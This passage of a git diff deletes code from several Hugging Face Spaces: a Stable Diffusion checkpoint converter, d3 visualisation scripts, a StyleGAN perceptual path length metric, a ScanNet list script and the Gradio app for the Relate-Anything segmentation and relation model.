torch.cat(tensors) - - for k_pre, tensors in capture_qkv_bias.items(): - if None in tensors: - raise Exception("CORRUPTED MODEL: one of the q-k-v values for the text encoder was missing") - relabelled_key = textenc_pattern.sub(lambda m: protected[re.escape(m.group(0))], k_pre) - new_state_dict[relabelled_key + ".in_proj_bias"] = torch.cat(tensors) - - return new_state_dict - - -def convert_text_enc_state_dict(text_enc_dict): - return text_enc_dict - - -def convert(model_path, checkpoint_path): - unet_path = osp.join(model_path, "unet", "diffusion_pytorch_model.bin") - vae_path = osp.join(model_path, "vae", "diffusion_pytorch_model.bin") - text_enc_path = osp.join(model_path, "text_encoder", "pytorch_model.bin") - - # Convert the UNet model - unet_state_dict = torch.load(unet_path, map_location="cpu") - unet_state_dict = convert_unet_state_dict(unet_state_dict) - unet_state_dict = {"model.diffusion_model." + k: v for k, v in unet_state_dict.items()} - - # Convert the VAE model - vae_state_dict = torch.load(vae_path, map_location="cpu") - vae_state_dict = convert_vae_state_dict(vae_state_dict) - vae_state_dict = {"first_stage_model." + k: v for k, v in vae_state_dict.items()} - - # Convert the text encoder model - text_enc_dict = torch.load(text_enc_path, map_location="cpu") - - # Easiest way to identify v2.0 model seems to be that the text encoder (OpenCLIP) is deeper - is_v20_model = "text_model.encoder.layers.22.layer_norm2.bias" in text_enc_dict - - if is_v20_model: - # Need to add the tag 'transformer' in advance so we can knock it out from the final layer-norm - text_enc_dict = {"transformer." + k: v for k, v in text_enc_dict.items()} - text_enc_dict = convert_text_enc_state_dict_v20(text_enc_dict) - text_enc_dict = {"cond_stage_model.model." + k: v for k, v in text_enc_dict.items()} - else: - text_enc_dict = convert_text_enc_state_dict(text_enc_dict) - text_enc_dict = {"cond_stage_model.transformer." + k: v for k, v in text_enc_dict.items()} - - # Put together new checkpoint - state_dict = {**unet_state_dict, **vae_state_dict, **text_enc_dict} - state_dict = {k: v.half() for k, v in state_dict.items()} - state_dict = {"state_dict": state_dict} - torch.save(state_dict, checkpoint_path) - del state_dict, text_enc_dict, vae_state_dict, unet_state_dict - torch.cuda.empty_cache() - gc.collect() - \ No newline at end of file diff --git a/spaces/merve/fill-in-the-blank/source/uncertainty-calibration/footnote.js b/spaces/merve/fill-in-the-blank/source/uncertainty-calibration/footnote.js deleted file mode 100644 index 05eac09cc1b8466bb2c440b6fd23060cd91f5017..0000000000000000000000000000000000000000 --- a/spaces/merve/fill-in-the-blank/source/uncertainty-calibration/footnote.js +++ /dev/null @@ -1,73 +0,0 @@ -!(() => { - var ttFnSel = d3.select('body').selectAppend('div.tooltip-footnote.tooltip-footnote-hidden') - - function index2superscipt(i){ - return (i + 1 + '') - .split('') - .map(num => '⁰¹²³⁴⁵⁶⁷⁸⁹'[num]) - .join('') - } - - var footendSel = d3.selectAll('.footend') - .each(function(d, i){ - var sel = d3.select(this) - var ogHTML = sel.parent().html() - - sel - .at({href: '#footstart-' + i, id: 'footend-' + i}) - .text(index2superscipt(i)) - .datum(ogHTML) - }) - - footendSel.parent().parent().selectAll('br').remove() - - var footstartSel = d3.selectAll('.footstart') - .each(function(d, i){ - d3.select(this) - .at({ - href: '#footend-' + i, - }) - .text(index2superscipt(i)) - .datum(footendSel.data()[i]) - .parent().at({id: 'footstart-' + i}) - }) - .call(addLockedTooltip) - - - function addLockedTooltip(sel){ - sel - .on('mouseover', function(d, i){ - ttFnSel - .classed('tooltip-footnote-hidden', 0) - .html(d).select('.footend').remove() - - var [x, y] = d3.mouse(d3.select('html').node()) - var bb = ttFnSel.node().getBoundingClientRect(), - left = d3.clamp(20, (x-bb.width/2), window.innerWidth - bb.width - 20), - top = innerHeight + scrollY > y + 20 + bb.height ? y + 20 : y - bb.height - 10; - - ttFnSel.st({left, top}) - }) - .on('mousemove', mousemove) - .on('mouseout', mouseout) - - ttFnSel - .on('mousemove', mousemove) - .on('mouseout', mouseout) - - function mousemove(){ - if (window.__ttfade) window.__ttfade.stop() - } - - function mouseout(){ - if (window.__ttfade) window.__ttfade.stop() - window.__ttfade = d3.timeout( - () => ttFnSel.classed('tooltip-footnote-hidden', 1), - 250 - ) - } - } - -})() - - diff --git a/spaces/merve/hidden-bias/public/fill-in-the-blank/scatter.js b/spaces/merve/hidden-bias/public/fill-in-the-blank/scatter.js deleted file mode 100644 index f0656aaaf3fdbea7ab8c3f6e87d9f9a864ad6726..0000000000000000000000000000000000000000 --- a/spaces/merve/hidden-bias/public/fill-in-the-blank/scatter.js +++ /dev/null @@ -1,232 +0,0 @@ -/* Copyright 2021 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - - -window.initScatter = function(c){ - var rv = {data: [], cur_t: 0} - - var duration = 1 - if (!c.scatters) c.scatters = [rv] - - var [svgbot, ctx, divSel, svg] = c.layers - - var regl = createREGL({ - container: divSel.node(), - // attributes: {antialias: false}, - }) - - - // https://blocks.roadtolarissa.com/1wheel/0a58f8bf5a14f6a534b9043a9c63dd1d - // https://peterbeshai.com/blog/2017-05-26-beautifully-animate-points-with-webgl-and-regl/ - function drawRegl(){ - var {data} = rv - var t0 = performance.now() - - var tmpData = [ - {x: 0, y: 0}, - {x: .5, y: .5}, - {x: 1, y: 1}, - {x: -1, y: -1}, - ] - - var drawPoints = regl({ - vert: ` - precision mediump float; - attribute float x, y, px, py, isVisible; - - attribute vec3 color; - varying vec3 fragColor; - - uniform float interp; - void main() { - float xPos = isVisible < .5 ? -2.0 : mix(px, x, interp); - // float xPos = mix(px, x, interp); - float yPos = mix(py, y, interp); - gl_Position = vec4(xPos, yPos, 0, 1); - - gl_PointSize = ${devicePixelRatio > 3 ? 7 : devicePixelRatio > 1 ? 5 : 2}.0; - - fragColor = color; - }`, - frag: ` - precision mediump float; - varying vec3 fragColor; - void main() { - gl_FragColor = vec4(fragColor, 1.0); - }`, - - - attributes: { - x: data.map(d => d.x/c.width*2 - 1), - y: data.map(d => -d.y/c.height*2 + 1), - px: data.map(d => d.p.x/c.width*2 - 1), - py: data.map(d => -d.p.y/c.height*2 + 1), - color: data.map(d => d.color), - isVisible: data.map(d => c.type != 'c' || d.isVisible ? 1 : 0), - }, - uniforms: { - interp: (ctx, props) => props.interp, - }, - primitive: 'point', - count: data.length, - }) - - drawPoints({interp: 0}) - - if (rv.regltick) rv.regltick.cancel() - rv.regltick = regl.frame(({ time }) => { - var dt = performance.now() - t0 + 8 - var interp = d3.easeCubic(d3.clamp(0, dt/duration, 1)) - - drawPoints({interp}) - if (1 == interp && rv.regltick) rv.regltick.cancel() - - // c.svg.selectAppend('text.debug').text(dt + ' ' + interp) - }) - } - - var centerPathSel = c.svg.selectAppend('path.center') - .st({pointerEvents: 'none', strokeWidth: .3, stroke: '#ccc'}) - - rv.draw = function(c, data, isxy){ - rv.pData = rv.data - rv.data = data - - if (!rv.pData.length) rv.pData = rv.data - - data.forEach((d, i) => { - d.prettyWord = d.word.replace('▁', '') - d.color = util.color2array(d.fill) - // console.log(d.color) - d.i = i - d.p = rv.pData[i] - if (!d.p) debugger - // ctx.fillStyle = d.fill - // ctx.fillRect(d.x - d.s/2, d.y - d.s/2, d.s, d.s) - }) - - - - var tinyTextSel = svg.selectAll('text.tiny') - .data(data.filter(d => d.show), d => d.word) - - tinyTextSel.exit() - .transition().duration(duration) - .translate(d => [rv.data[d.i].x, rv.data[d.i].y]) - .at({fill: d => d.fill, opacity: 0}) - .remove() - - tinyTextSel.enter().append('text.tiny') - .text(d => d.prettyWord) - .at({ - dy: d => d.show[0] == 'u' ? -2 : 10, - dx: d => d.show[1] == 'r' ? 2 : -2, - textAnchor: d => d.show[1] == 'r' ? '' : 'end', - fill: d => d.p.fill, - opacity: 0 - }) - .translate(d => [d.p.x, d.p.y]) - .merge(tinyTextSel) - .transition().duration(duration) - .translate(d => [d.x, d.y]) - .at({fill: d => d.fill, opacity: 1}) - - c.svg.transition().duration(duration) - .attrTween('cur_t', function(){ - rv.cur_t = 0 - drawRegl() - - return t => { - rv.cur_t = t - } - }) - - centerPathSel - .raise() - .transition().duration(duration)//.ease(d3.easeQuadIn) - .at({d: isxy ? - ['M', 0, c.height, 'L', c.width, 0].join(' ') : - ['M', 0, c.y(0) + .5, 'L', c.width, c.y(0) + .5].join(' ') - }) - - setTimeout(() => duration = c.scatters.length > 1 ? 600 : 600, 1) - - // svg.appendMany('text.tiny', data.filter(d => d.show)) - // .text(d => d.prettyWord) - // .translate(d => [d.x, d.y]) - // .at({ - // dy: d => d.show[0] == 'u' ? -2 : 10, - // dx: d => d.show[1] == 'r' ? 2 : -2, - // textAnchor: d => d.show[1] == 'r' ? '' : 'end', - // fill: d => d.fill, - // }) - } - - function addHover(){ - var curHover = '' - var hoverSel = svg.append('g.hover').st({opacity: 0, pointerEvents: 'none'}) - - hoverSel.append('circle') - .at({r: 5, fill: 'none', stroke: '#000'}) - - var hoverTextSel = hoverSel.appendMany('text', [0, 1]) - .at({x: 10, y: 5, stroke: d => d ? '' : '#000'}) - .st({fontFamily: 'monospace'}) - - svg.append('rect') - .at({width: c.width, height: c.height, fill: 'rgba(0,0,0,0)'}) - - svg - .on('mousemove', function(){ - var [x, y] = d3.mouse(this) - - var match = _.minBy(rv.data.filter(d => d.isVisible), d => { - var dx = x - d.x - var dy = y - d.y - - return dx*dx + dy*dy - }) - - if (match && curHover != match.word) setHoverAll(match.word) - }) - .on('mouseout', function(){ - curHover = null - setHoverAll(null) - }) - - function setHoverAll(word){ - c.scatters.forEach(d => d.setHover(word)) - } - - rv.setHover = word => { - var d = _.find(rv.data, {word}) - if (!d){ - hoverSel.st({opacity: 0}) - hoverTextSel.text('') - return - } - curHover = word - - hoverSel.translate([d.x, d.y]).raise().st({opacity: 1}) - hoverTextSel.text(d.prettyWord) - } - } - addHover() - - return rv -} - - -if (window.init) init() diff --git a/spaces/merve/hidden-bias/public/measuring-fairness/gs.js b/spaces/merve/hidden-bias/public/measuring-fairness/gs.js deleted file mode 100644 index f3f72c87ecdb3e28fb4f4d198d70900b431151c2..0000000000000000000000000000000000000000 --- a/spaces/merve/hidden-bias/public/measuring-fairness/gs.js +++ /dev/null @@ -1,106 +0,0 @@ -/* Copyright 2020 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - - - - -window.makeGS = function(){ - var gs = {} - - var bodySel = d3.select('body') - - var prevSlideIndex = -1 - function updateSlide(i){ - var slide = slides[i] - if (!slide) return - - gs.prevSlide = gs.curSlide - gs.curSlide = slide - - var dur = gs.prevSlide ? 500*1 : 0 - - sel.personSel.transition().duration(dur) - .translate(d => d.pos[slide.pos]) - - sel.textSel.transition().duration(dur) - .at({fill: slide.textFill}) - - - sel.rectSel.transition('opacity').duration(dur) - .at({opacity: slide.rectOpacity}) - - if (!slide.animateThreshold){ - sel.rectSel.transition('fill').duration(dur) - .at({fill: slide.rectFill}) - - sel.textSel.transition('stroke').duration(dur) - .st({strokeWidth: slide.textStroke}) - - slider.setSlider(slide.threshold, true) - bodySel.transition('gs-tween') - } else { - sel.rectSel.transition('fill').duration(dur) - sel.textSel.transition('stroke').duration(dur) - - bodySel.transition('gs-tween').duration(dur*2) - .attrTween('gs-tween', () => { - var i = d3.interpolate(slider.threshold, slide.threshold) - - return t => { - slider.setSlider(i(t)) - } - }) - } - - - sel.truthAxis.transition().duration(dur) - .st({opacity: slide.truthAxisOpacity}) - - sel.mlAxis.transition().duration(dur) - .st({opacity: slide.mlAxisOpacity}) - - sel.fpAxis.transition().duration(dur) - .st({opacity: slide.fpAxisOpacity}) - - sel.sexAxis.transition().duration(dur) - .st({opacity: slide.sexAxisOpacity}) - - sel.brAxis.transition().duration(dur) - .st({opacity: slide.brAxisOpacity}) - - sel.botAxis.transition().duration(dur) - .translate(slide.botAxisY, 1) - - - prevSlideIndex = i - slides.curSlide = slide - } - - gs.graphScroll = d3.graphScroll() - .container(d3.select('.container-1')) - .graph(d3.selectAll('container-1 #graph')) - .eventId('uniqueId1') - .sections(d3.selectAll('.container-1 #sections > div')) - .offset(innerWidth < 900 ? 300 : 520) - .on('active', updateSlide) - - return gs -} - - - - - -if (window.init) window.init() diff --git a/spaces/mfrashad/ClothingGAN/models/stylegan/stylegan_tf/metrics/perceptual_path_length.py b/spaces/mfrashad/ClothingGAN/models/stylegan/stylegan_tf/metrics/perceptual_path_length.py deleted file mode 100644 index 17271cfdf1545a26ab71d309ce2180532f513bd6..0000000000000000000000000000000000000000 --- a/spaces/mfrashad/ClothingGAN/models/stylegan/stylegan_tf/metrics/perceptual_path_length.py +++ /dev/null @@ -1,108 +0,0 @@ -# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. -# -# This work is licensed under the Creative Commons Attribution-NonCommercial -# 4.0 International License. To view a copy of this license, visit -# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to -# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. - -"""Perceptual Path Length (PPL).""" - -import numpy as np -import tensorflow as tf -import dnnlib.tflib as tflib - -from metrics import metric_base -from training import misc - -#---------------------------------------------------------------------------- - -# Normalize batch of vectors. -def normalize(v): - return v / tf.sqrt(tf.reduce_sum(tf.square(v), axis=-1, keepdims=True)) - -# Spherical interpolation of a batch of vectors. -def slerp(a, b, t): - a = normalize(a) - b = normalize(b) - d = tf.reduce_sum(a * b, axis=-1, keepdims=True) - p = t * tf.math.acos(d) - c = normalize(b - d * a) - d = a * tf.math.cos(p) + c * tf.math.sin(p) - return normalize(d) - -#---------------------------------------------------------------------------- - -class PPL(metric_base.MetricBase): - def __init__(self, num_samples, epsilon, space, sampling, minibatch_per_gpu, **kwargs): - assert space in ['z', 'w'] - assert sampling in ['full', 'end'] - super().__init__(**kwargs) - self.num_samples = num_samples - self.epsilon = epsilon - self.space = space - self.sampling = sampling - self.minibatch_per_gpu = minibatch_per_gpu - - def _evaluate(self, Gs, num_gpus): - minibatch_size = num_gpus * self.minibatch_per_gpu - - # Construct TensorFlow graph. - distance_expr = [] - for gpu_idx in range(num_gpus): - with tf.device('/gpu:%d' % gpu_idx): - Gs_clone = Gs.clone() - noise_vars = [var for name, var in Gs_clone.components.synthesis.vars.items() if name.startswith('noise')] - - # Generate random latents and interpolation t-values. - lat_t01 = tf.random_normal([self.minibatch_per_gpu * 2] + Gs_clone.input_shape[1:]) - lerp_t = tf.random_uniform([self.minibatch_per_gpu], 0.0, 1.0 if self.sampling == 'full' else 0.0) - - # Interpolate in W or Z. - if self.space == 'w': - dlat_t01 = Gs_clone.components.mapping.get_output_for(lat_t01, None, is_validation=True) - dlat_t0, dlat_t1 = dlat_t01[0::2], dlat_t01[1::2] - dlat_e0 = tflib.lerp(dlat_t0, dlat_t1, lerp_t[:, np.newaxis, np.newaxis]) - dlat_e1 = tflib.lerp(dlat_t0, dlat_t1, lerp_t[:, np.newaxis, np.newaxis] + self.epsilon) - dlat_e01 = tf.reshape(tf.stack([dlat_e0, dlat_e1], axis=1), dlat_t01.shape) - else: # space == 'z' - lat_t0, lat_t1 = lat_t01[0::2], lat_t01[1::2] - lat_e0 = slerp(lat_t0, lat_t1, lerp_t[:, np.newaxis]) - lat_e1 = slerp(lat_t0, lat_t1, lerp_t[:, np.newaxis] + self.epsilon) - lat_e01 = tf.reshape(tf.stack([lat_e0, lat_e1], axis=1), lat_t01.shape) - dlat_e01 = Gs_clone.components.mapping.get_output_for(lat_e01, None, is_validation=True) - - # Synthesize images. - with tf.control_dependencies([var.initializer for var in noise_vars]): # use same noise inputs for the entire minibatch - images = Gs_clone.components.synthesis.get_output_for(dlat_e01, is_validation=True, randomize_noise=False) - - # Crop only the face region. - c = int(images.shape[2] // 8) - images = images[:, :, c*3 : c*7, c*2 : c*6] - - # Downsample image to 256x256 if it's larger than that. VGG was built for 224x224 images. - if images.shape[2] > 256: - factor = images.shape[2] // 256 - images = tf.reshape(images, [-1, images.shape[1], images.shape[2] // factor, factor, images.shape[3] // factor, factor]) - images = tf.reduce_mean(images, axis=[3,5]) - - # Scale dynamic range from [-1,1] to [0,255] for VGG. - images = (images + 1) * (255 / 2) - - # Evaluate perceptual distance. - img_e0, img_e1 = images[0::2], images[1::2] - distance_measure = misc.load_pkl('https://drive.google.com/uc?id=1N2-m9qszOeVC9Tq77WxsLnuWwOedQiD2') # vgg16_zhang_perceptual.pkl - distance_expr.append(distance_measure.get_output_for(img_e0, img_e1) * (1 / self.epsilon**2)) - - # Sampling loop. - all_distances = [] - for _ in range(0, self.num_samples, minibatch_size): - all_distances += tflib.run(distance_expr) - all_distances = np.concatenate(all_distances, axis=0) - - # Reject outliers. - lo = np.percentile(all_distances, 1, interpolation='lower') - hi = np.percentile(all_distances, 99, interpolation='higher') - filtered_distances = np.extract(np.logical_and(lo <= all_distances, all_distances <= hi), all_distances) - self._report_result(np.mean(filtered_distances)) - -#---------------------------------------------------------------------------- diff --git a/spaces/ml-energy/leaderboard/docs/colosseum_bottom.md b/spaces/ml-energy/leaderboard/docs/colosseum_bottom.md deleted file mode 100644 index 74992ef4e140a34f47a1f6b6e911a39d67effb48..0000000000000000000000000000000000000000 --- a/spaces/ml-energy/leaderboard/docs/colosseum_bottom.md +++ /dev/null @@ -1,11 +0,0 @@ -### Technical details - -- We allow models to generate only up to 512 new tokens. Due to this, some responses may be cut off in the middle. -- Tokens are sampled from the model output with `temperature` 1.0, `repetition_penalty` 1.0, `top_k` 50, and `top_p` 0.95. -- Large models (>= 30B) run on two NVIDIA A40 GPUs with tensor parallelism, whereas other models run on one NVIDIA A40 GPU. We directly measure the energy consumption of these GPUs. - -### Contact - -Please direct general questions and issues related to the Colosseum to our GitHub repository's [discussion board](https://github.com/ml-energy/leaderboard/discussions). -You can find the ML.ENERGY initiative members in [our homepage](https://ml.energy#members). -If you need direct communication, please email admins@ml.energy. diff --git a/spaces/mmlab-ntu/Segment-Any-RGBD/datasets/scannet_preprocess/scannet_pair/generage_list.py b/spaces/mmlab-ntu/Segment-Any-RGBD/datasets/scannet_preprocess/scannet_pair/generage_list.py deleted file mode 100644 index 8faf9feb74b68123bd363e08f7603bc7ad12c8b7..0000000000000000000000000000000000000000 --- a/spaces/mmlab-ntu/Segment-Any-RGBD/datasets/scannet_preprocess/scannet_pair/generage_list.py +++ /dev/null @@ -1,31 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - - -import argparse -import glob, os, sys - -from SensorData import SensorData - -# params -parser = argparse.ArgumentParser() -# data paths -parser.add_argument('--target_dir', required=True, help='path to the target dir') - -opt = parser.parse_args() -print(opt) - -def main(): - overlaps = glob.glob(os.path.join(opt.target_dir, "*/pcd/overlap.txt")) - with open(os.path.join(opt.target_dir, 'overlap30.txt'), 'w') as f: - for fo in overlaps: - for line in open(fo): - pcd0, pcd1, op = line.strip().split() - if float(op) >= 0.3: - print('{} {} {}'.format(pcd0, pcd1, op), file=f) - print('done') - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/spaces/mmlab-ntu/relate-anything-model/app.py b/spaces/mmlab-ntu/relate-anything-model/app.py deleted file mode 100644 index fc6af792914297f87735bf13fef51487e8bc09fe..0000000000000000000000000000000000000000 --- a/spaces/mmlab-ntu/relate-anything-model/app.py +++ /dev/null @@ -1,313 +0,0 @@ -import sys -sys.path.append('.') - -from segment_anything import build_sam, SamPredictor, SamAutomaticMaskGenerator -import numpy as np -import gradio as gr -from PIL import Image, ImageDraw, ImageFont -from utils import iou, sort_and_deduplicate, relation_classes, MLP, show_anns, show_mask -import torch - -from ram_train_eval import RamModel,RamPredictor -from mmengine.config import Config - -device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') - -input_size = 512 -hidden_size = 256 -num_classes = 56 - -# load sam model -sam = build_sam(checkpoint="./checkpoints/sam_vit_h_4b8939.pth").to(device) -predictor = SamPredictor(sam) -mask_generator = SamAutomaticMaskGenerator(sam) - -# load ram model -model_path = "./checkpoints/ram_epoch12.pth" -config = dict( - model=dict( - pretrained_model_name_or_path='bert-base-uncased', - load_pretrained_weights=False, - num_transformer_layer=2, - input_feature_size=256, - output_feature_size=768, - cls_feature_size=512, - num_relation_classes=56, - pred_type='attention', - loss_type='multi_label_ce', - ), - load_from=model_path, -) -config = Config(config) - -class Predictor(RamPredictor): - def __init__(self,config): - self.config = config - self.device = torch.device( - 'cuda' if torch.cuda.is_available() else 'cpu') - self._build_model() - - def _build_model(self): - self.model = RamModel(**self.config.model).to(self.device) - if self.config.load_from is not None: - self.model.load_state_dict(torch.load(self.config.load_from, map_location=self.device)) - self.model.train() - -model = Predictor(config) - - -# visualization -def draw_selected_mask(mask, draw): - color = (255, 0, 0, 153) - nonzero_coords = np.transpose(np.nonzero(mask)) - for coord in nonzero_coords: - draw.point(coord[::-1], fill=color) - -def draw_object_mask(mask, draw): - color = (0, 0, 255, 153) - nonzero_coords = np.transpose(np.nonzero(mask)) - for coord in nonzero_coords: - draw.point(coord[::-1], fill=color) - - -def vis_selected(pil_image, coords): - w, h = pil_image.size - max_edge = 1500 - if w > max_edge or h > max_edge: - ratio = max(w, h) / max_edge - new_size = (int(w / ratio), int(h / ratio)) - pil_image.thumbnail(new_size) - coords = str(int(int(coords.split(',')[0]) * new_size[0] / w)) + ',' + str(int(int(coords.split(',')[1]) * new_size[1] / h)) - - # get coords - coords_x, coords_y = coords.split(',') - input_point = np.array([[int(coords_x), int(coords_y)]]) - input_label = np.array([1]) - - # load image - image = np.array(pil_image) - predictor.set_image(image) - mask1, score1, logit1, feat1 = predictor.predict( - point_coords=input_point, - point_labels=input_label, - multimask_output=False, - ) - pil_image = pil_image.convert('RGBA') - mask_image = Image.new('RGBA', pil_image.size, color=(0, 0, 0, 0)) - mask_draw = ImageDraw.Draw(mask_image) - draw_selected_mask(mask1[0], mask_draw) - pil_image.alpha_composite(mask_image) - - yield [pil_image] - - -def create_title_image(word1, word2, word3, width, font_path='./assets/OpenSans-Bold.ttf'): - # Define the colors to use for each word - color_red = (255, 0, 0) - color_black = (0, 0, 0) - color_blue = (0, 0, 255) - - # Define the initial font size and spacing between words - font_size = 40 - - # Create a new image with the specified width and white background - image = Image.new('RGB', (width, 60), (255, 255, 255)) - - # Load the specified font - font = ImageFont.truetype(font_path, font_size) - - # Keep increasing the font size until all words fit within the desired width - while True: - # Create a draw object for the image - draw = ImageDraw.Draw(image) - - word_spacing = font_size / 2 - # Draw each word in the appropriate color - x_offset = word_spacing - draw.text((x_offset, 0), word1, color_red, font=font) - x_offset += font.getsize(word1)[0] + word_spacing - draw.text((x_offset, 0), word2, color_black, font=font) - x_offset += font.getsize(word2)[0] + word_spacing - draw.text((x_offset, 0), word3, color_blue, font=font) - - word_sizes = [font.getsize(word) for word in [word1, word2, word3]] - total_width = sum([size[0] for size in word_sizes]) + word_spacing * 3 - - # Stop increasing font size if the image is within the desired width - if total_width <= width: - break - - # Increase font size and reset the draw object - font_size -= 1 - image = Image.new('RGB', (width, 50), (255, 255, 255)) - font = ImageFont.truetype(font_path, font_size) - draw = None - - return image - - -def concatenate_images_vertical(image1, image2): - # Get the dimensions of the two images - width1, height1 = image1.size - width2, height2 = image2.size - - # Create a new image with the combined height and the maximum width - new_image = Image.new('RGBA', (max(width1, width2), height1 + height2)) - - # Paste the first image at the top of the new image - new_image.paste(image1, (0, 0)) - - # Paste the second image below the first image - new_image.paste(image2, (0, height1)) - - return new_image - - -def relate_selected(input_image, k, coords): - # load image - pil_image = input_image.convert('RGBA') - - w, h = pil_image.size - max_edge = 1500 - if w > max_edge or h > max_edge: - ratio = max(w, h) / max_edge - new_size = (int(w / ratio), int(h / ratio)) - pil_image.thumbnail(new_size) - input_image.thumbnail(new_size) - coords = str(int(int(coords.split(',')[0]) * new_size[0] / w)) + ',' + str(int(int(coords.split(',')[1]) * new_size[1] / h)) - - image = np.array(input_image) - sam_masks = mask_generator.generate(image) - # get old mask - coords_x, coords_y = coords.split(',') - input_point = np.array([[int(coords_x), int(coords_y)]]) - input_label = np.array([1]) - mask1, score1, logit1, feat1 = predictor.predict( - point_coords=input_point, - point_labels=input_label, - multimask_output=False, - ) - - filtered_masks = sort_and_deduplicate(sam_masks) - filtered_masks = [d for d in sam_masks if iou(d['segmentation'], mask1[0]) < 0.95][:k] - pil_image_list = [] - - # run model - feat = feat1 - for fm in filtered_masks: - feat2 = torch.Tensor(fm['feat']).unsqueeze(0).unsqueeze(0).to(device) - feat = torch.cat((feat, feat2), dim=1) - matrix_output, rel_triplets = model.predict(feat) - subject_output = matrix_output.permute([0,2,3,1])[:,0,1:] - - for i in range(len(filtered_masks)): - - output = subject_output[:,i] - - topk_indices = torch.argsort(-output).flatten() - relation = relation_classes[topk_indices[:1][0]] - - mask_image = Image.new('RGBA', pil_image.size, color=(0, 0, 0, 0)) - mask_draw = ImageDraw.Draw(mask_image) - - draw_selected_mask(mask1[0], mask_draw) - draw_object_mask(filtered_masks[i]['segmentation'], mask_draw) - - current_pil_image = pil_image.copy() - current_pil_image.alpha_composite(mask_image) - - title_image = create_title_image('Red', relation, 'Blue', current_pil_image.size[0]) - concate_pil_image = concatenate_images_vertical(current_pil_image, title_image) - pil_image_list.append(concate_pil_image) - - yield pil_image_list - - -def relate_anything(input_image, k): - w, h = input_image.size - max_edge = 1500 - if w > max_edge or h > max_edge: - ratio = max(w, h) / max_edge - new_size = (int(w / ratio), int(h / ratio)) - input_image.thumbnail(new_size) - - # load image - pil_image = input_image.convert('RGBA') - image = np.array(input_image) - sam_masks = mask_generator.generate(image) - filtered_masks = sort_and_deduplicate(sam_masks) - - feat_list = [] - for fm in filtered_masks: - feat = torch.Tensor(fm['feat']).unsqueeze(0).unsqueeze(0).to(device) - feat_list.append(feat) - feat = torch.cat(feat_list, dim=1).to(device) - matrix_output, rel_triplets = model.predict(feat) - - pil_image_list = [] - for i, rel in enumerate(rel_triplets[:k]): - s,o,r = int(rel[0]),int(rel[1]),int(rel[2]) - relation = relation_classes[r] - - mask_image = Image.new('RGBA', pil_image.size, color=(0, 0, 0, 0)) - mask_draw = ImageDraw.Draw(mask_image) - - draw_selected_mask(filtered_masks[s]['segmentation'], mask_draw) - draw_object_mask(filtered_masks[o]['segmentation'], mask_draw) - - current_pil_image = pil_image.copy() - current_pil_image.alpha_composite(mask_image) - - title_image = create_title_image('Red', relation, 'Blue', current_pil_image.size[0]) - concate_pil_image = concatenate_images_vertical(current_pil_image, title_image) - pil_image_list.append(concate_pil_image) - - yield pil_image_list - -DESCRIPTION = '''# Relate-Anyting - -### 🚀 🚀 🚀 RAM (Relate-Anything-Model) combines Meta's Segment-Anything model with the ECCV'22 paper: [Panoptic Scene Graph Generation](https://psgdataset.org/). -### 🤔 🤔 🤔 Given an image, RAM finds all the meaningful relations between anything. (Check Tab: Relate Anything) -### 🖱️ 🖱️ 🖱️ You can also click something on the image, and RAM find anything relates to that. (Check Tab: Relate Something) -### 🔥 🔥 🔥 Please star our codebase [OpenPSG](https://github.com/Jingkang50/OpenPSG) and [RAM](https://github.com/Luodian/RelateAnything) if you find it useful / interesting. -### It is recommended to upgrade to GPU in Settings after duplicating this space to use it. [![Duplicate this Space](https://huggingface.co/datasets/huggingface/badges/raw/main/duplicate-this-space-md-dark.svg)](https://huggingface.co/spaces/mmlab-ntu/relate-anything-model?duplicate=true) -### Here is a 3-day Gradio link: https://bf5e65e511446cbe60.gradio.live/, expires by 3am, April 28, Singapore Time. -''' - -block = gr.Blocks() -block = block.queue() -with block: - gr.Markdown(DESCRIPTION) - with gr.Row(): - with gr.Column(): - input_image = gr.Image(source="upload", type="pil", value="assets/dog.jpg") - - with gr.Tab("Relate Anything"): - num_relation = gr.Slider(label="How many relations do you want to see", minimum=1, maximum=20, value=5, step=1) - relate_all_button = gr.Button(label="Relate Anything!") - - with gr.Tab("Relate Something"): - img_input_coords = gr.Textbox(label="Click something to get input coords") - - def select_handler(evt: gr.SelectData): - coords = evt.index - return f"{coords[0]},{coords[1]}" - - input_image.select(select_handler, None, img_input_coords) - run_button_vis = gr.Button(label="Visualize the Select Thing") - selected_gallery = gr.Gallery(label="Selected Thing", show_label=True, elem_id="gallery").style(object_fit="scale-down") - - k = gr.Slider(label="Number of things you want to relate", minimum=1, maximum=20, value=5, step=1) - relate_selected_button = gr.Button(value="Relate it with Anything", interactive=True) - - with gr.Column(): - image_gallery = gr.Gallery(label="Your Result", show_label=True, elem_id="gallery").style(preview=True, columns=5, object_fit="scale-down") - - # relate anything - relate_all_button.click(fn=relate_anything, inputs=[input_image, num_relation], outputs=[image_gallery], show_progress=True, queue=True) - - # relate selected - run_button_vis.click(fn=vis_selected, inputs=[input_image, img_input_coords], outputs=[selected_gallery], show_progress=True, queue=True) - relate_selected_button.click(fn=relate_selected, inputs=[input_image, k, img_input_coords], outputs=[image_gallery], show_progress=True, queue=True) - -block.launch() diff --git a/spaces/moin1234/XAGPT1/README.md b/spaces/moin1234/XAGPT1/README.md deleted file mode 100644 index 4cac071bfc45d19f64a73ae610f32c5c963abc5b..0000000000000000000000000000000000000000 --- a/spaces/moin1234/XAGPT1/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: XAGPT1 -emoji: 